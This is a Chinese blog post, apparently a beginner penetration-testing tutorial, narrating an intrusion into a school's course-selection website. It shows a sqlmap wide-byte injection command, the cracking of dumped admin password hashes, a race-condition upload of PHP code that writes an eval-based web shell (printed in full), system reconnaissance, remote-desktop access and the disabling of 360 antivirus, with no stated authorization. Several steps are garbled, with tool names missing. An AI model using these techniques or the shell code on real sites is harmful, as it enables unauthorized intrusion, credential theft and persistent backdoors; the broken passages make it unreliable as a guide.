非常有效-渗透测试教程(基础篇)-1-新手漏洞指南
前言
之前对渗透这方面的学习一直只是学到了为止,但是其实渗透可以说仅仅是一个开端,接下去的还有远程连接,域渗透等领域,这次刚好渗透到了某网站,决定以该网站为例,看看能不能进行一次相对完整的渗透历程
SQL注入
该网站是某校某选课网站,首先先用扫描器扫描一下网站,运气很好,居然扫出了一个注入,一看,原来是个宽字节注入
简单测了一下,发现并没有什么过滤,那就常规操作,用跑一下
python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php?cid=118" --tamper=unmagicquotes
接下来便是爆库,爆表,爆列,爆值等常规操作。获取Admin表中的账号密码,虽说密码是md5加密的了,但是去cmd5平台上一查,还是很方便的进入了后台
接下来便是寻求的机会了
注意到这里有个上传文件的地方,从源码中可以看到是编辑器从网上搜索相关的漏洞,首先先查看版本
发现是2.6.6版本的,遗憾的是只能找到2.6.6asp版本的洞,PHP版本的并不能找到相关的漏洞,而用了几个EXP去试试运气也都碰壁了,渗透本来到此就受阻但是突然发现还有一个上传学生名单的接口
测试了一下,只有一个简单的前端认证,并且用一看,还有了惊喜的发现
文件不仅上传成功了,并且还返回了相应的路径,当下便想到来连shell了,但当我想来连之时,却发现文件被删了,由文件路径里面有个temp,一下子就想到后端肯定写了一个自动清空temp目录的函数,但是解决思路也是很明确的,就是条件竞争嘛,通过多线程发包的方法,来实现一定时间内的文件访问这里我将要发包的文件改为:
<?php file_put_contents('../success.php',"<?php phpinfo();@eval(\$_POST['a']); ?>"); ?>
只要我们能访问到它一次,这个程序就会自动在父目录里面写入一个shell,也就实现了跳出temp目录的写shell了。用的模块不断发包,再访问我们上传的文件,便实现了成功写shell的目的,如图,:
系统信息搜集
查看系统相关信息
-ano查看开放的端口
可以看到3389端口是打开的,也就是可以进行远程连接查看当前用户
远程连接
可以看到是权限,本来我以为大功告成,接下来就是创建管理员用户,进行远程连接之时,但是发现无论如何都无法把用户添加进管理员组在网上查了很多资料,有人说是可能有杀毒软件。一看,果然有360那么问题到这里就只有三条路了:1.杀掉360,看看能不能利用的高权限杀掉3602.得到其他管理员账户的密码或者密码的hash值,利用其他管理员的账户进行登录2.绕过360创建一个管理员账号
我对这三种情况都进行了尝试:
将..php上传至web目录(这里不能上传.php,php
说明配置正常最后,我们就能成功的使用远程连接了,上了远程连接后,首先退出360所有防护,为接下来的进一步渗透做准备
这次的渗透就先到这里,接下来的域渗透,就等以后有时间再来学习和钻研了。
写在后面
这是我第一次进行后的渗透,写的可能很啰嗦并且很LOW,但是主要目的还是想让我自己记住这一此渗透学习到的知识,等以后有时间了再来继续进行下一步的域渗透
[渗透书籍领取]
[渗透视频领取]
参考文章
网络安全学习路线图(思维导图)
网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。
1. 网络安全视频资料
2. 网络安全笔记/面试题
3. 网安电子书PDF资料
~
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
